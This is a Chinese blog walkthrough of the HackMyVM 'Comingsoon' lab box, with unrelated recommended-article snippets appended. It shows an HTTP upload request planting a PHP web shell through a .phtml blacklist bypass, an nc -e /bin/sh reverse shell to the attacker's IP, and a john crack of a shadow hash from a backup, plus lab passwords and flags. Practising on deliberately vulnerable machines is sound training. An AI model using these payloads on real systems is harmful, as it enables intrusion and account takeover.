Comingsoon-phtml

最新推荐文章于 2024-11-10 22:52:20 发布
最新推荐文章于 2024-11-10 22:52:20 发布
阅读量440 收藏 10
点赞数 4
分类专栏: HackMyVM 文章标签: 网络 安全 hack oscp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64696290/article/details/139737589
版权

刚开始没有IP
单用户修改密码也需要输入用户密码,不能改
/boot/grub/grub.cfg配置文件下

### BEGIN /etc/grub.d/00_header ###
set superusers="root"
password_pbkdf2 root grub.pbkdf2.sha512.10000.ACE3E31954E3E55AB9AB407CA8B6BC9D336B7376733F6B38DB1A2588CE98B6720458284C9C7C5B3AF79BB87046C0770269EF488A0090DF03FA738BCA0FAACD44.3367FD2518DDAC951F14DC7133D015542E0DA317473B41318DA591F20B01FEEBA368C09DA4E079297EDAC83B04445A014984418397306D48A4A5D033BE196B6C

看了wp,才知道root用户密码ToyStory3,进去后也没有dhclient命令获取ip
只能换一种方式,编辑vim /etc/network/interface
Linux(Debian)网卡设置_debian auto eth0-CSDN博客

comingsooneasy前端分析、文件上传绕过、提示信息利用、shadow 爆破、hydra 使用、

主机发现

sudo netdiscover -i eth0 -r 192.168.44.133/24
┌──(kali㉿kali)-[~]
└─$ fping -aqg 192.168.44.0/24

服务探测

sudo nmap -sV -A -T 4 -p- 192.168.44.137

只有22和80

目录爆破

http://192.168.44.137/notes.txt
Dave,

Last few jobs to do...

Set ssh to use keys only (passphrase same as the password)

Just need to sort the images out:
resize and scp them or using the built-in image uploader.

Test the backups and delete anything not needed.

Apply an https certificate.

Cheers,

Webdev

翻译

戴夫,

最后几项工作要做...

将 ssh 设置为仅使用密钥(密码与密码相同)

只需要对图像进行排序:
调整大小并对其进行 scp 或使用内置图像上传器。

测试备份并删除不需要的任何内容。

申请https证书。

干杯,

网络开发者


http://192.168.44.137/index.php
右键检查源码看到提示

 Upload images link if EnableUploader set 
 翻译
 如果设置了 EnableUploader,则上传图像链接

检查当前页面的cookie信息,发现base64编码的东西

RW5hYmxlVXBsb2FkZXIK 
ZmFsc2UK
解码后
EnableUploader
false

综上所述,把false改成true编码后dHJ1ZQ==,就会出现文件上传的入口
http://192.168.44.137/5df03f95b4ff4f4b5dabe53a5a1e15d7.php
burp抓包,这里后端使用黑名单限制了php后缀的上传,尝试使用phtml后缀被解析成功。

POST /5df03f95b4ff4f4b5dabe53a5a1e15d7.php HTTP/1.1
Host: 192.168.44.137
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------30594177056923721121592264423
Content-Length: 379
Origin: http://192.168.44.137
Connection: close
Referer: http://192.168.44.137/5df03f95b4ff4f4b5dabe53a5a1e15d7.php
Cookie: RW5hYmxlVXBsb2FkZXIK=dHJ1ZQ==
Upgrade-Insecure-Requests: 1

-----------------------------30594177056923721121592264423
Content-Disposition: form-data; name="fileToUpload"; filename="1.phtml"
Content-Type: image/png
<?php system($_GET['cmd']);?>
-----------------------------30594177056923721121592264423
Content-Disposition: form-data; name="submit"

Upload Image
-----------------------------30594177056923721121592264423--

命令执行

http://192.168.44.137/assets/img/1.phtml?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

nc反弹shell

http://192.168.44.137/assets/img/1.phtml?cmd=nc -e /bin/sh 192.168.44.128 9001

python3 -c 'import pty;pty.spawn("/bin/bash")'
或者
script /dev/null -c bash
export TERM=xterm
Ctrl+z快捷键
stty raw -echo;fg
reset

提权

目前看啥都没权限
只有/var/backups/目录下有个备份文件backup.tar.gz有用

www-data@comingsoon:/var/backups$ cp backup.tar.gz /tmp
www-data@comingsoon:/tmp$ tar -zxvf backup.tar.gz
www-data@comingsoon:/tmp$ cat etc/shadow

root:$y$j9T$/E0VUDL7uS9RsrvwmGcOH0$LEB/7ERUX9bkm646n3v3RJBxttSVWmTBvs2tUjKe9I6:18976:0:99999:7:::
scpuser:$y$j9T$rVt3bxjp6uYKKYJbYU2Zq0$Ysn02LrCwTUB7iQdRiROO7/WQi8JSGtwLZllR54iX0.:18976:0:99999:7:::

爆破

┌──(kali㉿kali)-[~/桌面/OSCP]
└─$ john -w=../rockyou.txt comningsoon --format=crypt 

tigger           (scpuser)

切换用户

www-data@comingsoon:/home$ su scpuser //tigger

scpuser@comingsoon:~$ cat user.txt
cat user.txt
HMV{user:comingsoon.hmv:58842fc1a7}

查看老密码

scpuser@comingsoon:~$ cat .oldpasswords
cat .oldpasswords
Previous root passwords just incase they are needed for a backup\restore

Incredibles2
Paddington2
BigHero6
101Dalmations

参考这个链接才知道老密码的用处,原来密码是带有数字的动画电影名字:

https://28right.blogspot.com/2021/12/hackmyvm-comingsoon.html
生成单词列表

curl https://www.rottentomatoes.com/top/bestofrt/top_100_animation_movies/|grep ")</a>"|sed 's/[(].*$//'|tr -d ' '> wordlist

应该上面的链接已经失效了,也知道思路了。这里就直接拿别人的密码登录了。

root:ToyStory3

root@comingsoon:~# cat root.txt
cat root.txt
HMV{root:comingsoon.hmv:2339dc81ca}
2021-12-16 vue移动端卖座电影项目(十三) 使用vuex的getter筛选comingSoon的显示电影数
GAARA
12-16 252
1.Getter:把Store中数据处理形成新数据 Getter 可以对 Store 中已有的数据加工处理之后形成新的数据,类似 Vue 中的计算属性。 Store 中数据发生变化,Getter 的数据也会跟着变化。 2.使用vuex的getter筛选comingSoon的显示电影数 store/index.js
Sheesha-Comingsoon
02-12
Create React App入门 该项目是通过。 可用脚本 在项目目录中,可以运行: npm start 在开发模式下运行应用程序。 打开在浏览器中查看。 如果进行编辑,页面将重新加载。 您还将在控制台中看到任何棉绒错误。...
React-router6
weixin_44813858的博客
08-16 208
React-router6.0
vue63-83
qq_72343101的博客
02-10 148
vue
React - 路由 - V5
weixin_50206068的博客
12-30 185
react 路由v5 - 简单明了
喵喵电影-前端页面开发
weixin_56428769的博客
04-25 2550
喵喵电影前端页面开发 文章目录喵喵电影前端页面开发前言一、项目预览二、开发前准备1.Vue脚手架:vue-cli2.node环境:npm cnpm3.安装插件三、实战开发1.创建项目 miaomiao总结 前言 提示:这是第一次开发项目写博客。本博客主要讲Vue实战之开发喵喵电影中的过程和代码 一、项目预览 主页 影院 电影详情 二、开发前准备 1.Vue脚手架:vue-cli 代码如下(示例): npm install -g @vue/cli-service-global 2.node环境:
Vue学习笔记-3
yjnlovepy的博客
02-10 434
Vue学习笔记
react-redux-异步
weixin_30709061的博客
10-30 109
############################################## 或许是不知梦的缘故,流离之人追逐幻影。 ############################################## -----------------------------------store----------------------------------------...
探索未来:StartBootstrap Coming Soon - 网页预发布模板
gitblog_00093的博客
04-27 364
探索未来:StartBootstrap Coming Soon - 网页预发布模板 startbootstrap-coming-soonA coming soon theme with a video background for Bootstrap 4项目地址:https://gitcode.com/gh_mirrors/st/startbootstrap-coming-soon 是一个开源的...
vue-router路由使用
Cupid
08-18 153
vue-router路由使用 现在的应用都流行SPA应用(single page application) 传统的项目大多使用多页面结构,需要切换内容的时候我们往往会进行单个html文件的跳转,这个时候受网络、性能影响,浏览器会出现不定时间的空白界面,用户体验不好。 单页面应用就是用户通过某些操作更改地址栏url之后,动态的进行不同模板内容的无刷新切换,用户体验好。 Vue中会使用官方提...
Game-Of-Life-master_sun6ma_game_comingsoon_
10-03
Game-Of-LifeA simple simulator showing the game of life based on Conway's Game of Life. Run Game.py to start!Note: settings functions not enabled yet coming soon!Prerequisitespython pygame module ...
groupletter-comingsoon:集团策划的通讯
06-21
Groupletters.io - 即将推出页面 现在 Groupletters.io 即将到来的临时页面。 开发说明 在您的计算机上需要: 节点 Ruby 萨斯 启动时运行: npm install 开发时运行: ... 本地测试服务器现在在可用 ...
Comingsoon
10-25
《即将到来:探索“Comingsoon”页面的设计与字体应用》 在网页设计领域,"Comingsoon"页面是一个常见的元素,用于预告网站即将上线或更新。它不仅能够吸引访客的注意力,还能为用户提供一种期待感。在这个专题中,...
codecard_comingsoon
03-18
在`codecard_comingsoon-main`这个压缩包文件中,我们可以期待找到以下内容: 1. **源代码文件**:包含使用Handlebars编写的HTML模板,可能还有JavaScript文件用于处理数据和助手方法。 2. **示例**:演示如何使用这...
嵌入式学习-网络高级-Day01
Xiaomo1536的博客
11-06 1065
对于读数据以及写单个来说,在主机询问报文里面报文头中字节长度固定,都是0x0006,(1个字节的单元标识符,1个字节功能码,2个字节的地址,2个字节的数据)输入寄存器,这个和保持寄存器类似,但是也是只支持读而不能写。报文头------功能码-------起始地址-------数量--------字节计数--------数据。报文头(字节长度可能发生变化)------功能码------字节计数-------数据。报文头------功能码-------地址-------数据/断通标志(2个字节)
tcp三次握手和四次挥手
qq_25096749的博客
11-06 635
三次握手与四次挥手
Tcp/Ip协议,tcp相关文章,网络编程,通信协议文章汇总
求是
11-10 99
学习时候,有些书籍读了就忘记了。常读常新,特此留下地址。1. tcp/ip 协议卷。2.不为人知的网络编程。
day07|计算机网络重难点之 TCP连接三次握手、四次挥手的过程及原因、TCP 的 Keepalive 和 HTTP 的 Keep-Alive的区别
2402_84438596的博客
11-07 956
day07|计算机网络重难点之 TCP连接三次握手、四次挥手的过程及原因、TCP 的 Keepalive 和 HTTP 的 Keep-Alive的区别
C++编程:利用环形缓冲区优化 TCP 发送流程,避免 Short Write 问题
最新发布
Where there is life, there is hope.
11-10 734
在 TCP 编程中,`short write` 问题指的是在调用 `send` 或 `write` 系统调用时,实际发送的数据量比预期要少。这通常是因为网络协议栈发送缓冲区的空间不足,导致不能一次性发送完整的数据。遇到这种情况时,系统调用会返回实际发送的字节数,并将 `errno` 设置为 `EAGAIN`,表示缓冲区没有足够的空间来继续发送数据。
ComingSoon组件
10-09
ComingSoon组件通常是指网站或应用在上线前使用的预览页面,它用于显示项目即将发布的信息,例如发布时间表、预告图片、简短的描述等。这类组件常见于开发阶段或者新功能即将推出时,作为占位符展示给访问者,让他们了解项目的最新动态。 在Web开发中,ComingSoon组件可能是一个简单的静态页面,包括一个倒计时钟、登录/订阅表单,或者是一些关于产品的背景信息轮播。设计上可能会有吸引人的动画效果和清晰的品牌风格,以便提升用户的期待感和参与度。 在Vue.js中,你可以创建一个ComingSoon组件,使用自定义组件的方式定义HTML结构和逻辑,并可以利用Vuex管理状态,比如倒计时的时间。例如,你可以在`.vue`文件里定义如下: ```html <template> <div class="coming-soon"> <h1>{{ countdownText }}</h1> <p>{{ description }}</p> <button @click="startCountdown">开始倒计时</button> </div> </template> <script> export default { data() { return { countDownDate: new Date('your-release-date'), countdownText: '即将发布...', description: '敬请期待...', }; }, methods: { startCountdown() { // 计时逻辑 }, }, }; </script> ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

是乙太呀

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值